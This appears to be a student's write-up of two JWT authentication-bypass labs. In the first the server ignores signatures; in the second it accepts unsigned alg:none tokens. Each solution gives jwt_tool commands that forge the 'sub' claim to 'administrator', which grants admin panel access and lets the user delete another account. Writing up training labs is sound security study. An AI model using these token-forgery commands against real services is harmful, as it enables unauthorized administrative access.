JWT

Apprentice lab:
JWT authentication bypass via unverified signature

This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter

• Solution

  1. Log in as wiener:peter.
  2. Notice in the requests the cookie is a JWT token.
  3. Try accessing /admin, export (x4) the request.
  4. Run jwt_tool.

     jwt_tool.py -r request.txt

     Observe the decoded token values.
  5. Run the following.

     jwt_tool.py -r request.txt -I -pc sub -pv administrator -v

  6. Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
  7. Access /admin panel and delete Carlilto.

Practitioner lab:
JWT authentication bypass via flawed signature verification

This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter

• Solution

  1. Log in as wiener:peter.
  2. Notice in the requests the cookie is a JWT token.
  3. Try accessing /admin, export (x4) the request.
  4. Run jwt_tool.

     jwt_tool.py -r request.txt

     Observe the decoded token values.
  5. Run the following.

     jwt_tool.py -r request.txt -I -pc sub -pv administrator -v -X a

     alg:none exploit option was chosen.
  6. Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
  7. Access /admin panel and delete Carlilto.

Caution

JWT uses Base64url, which is slightly different from Base64.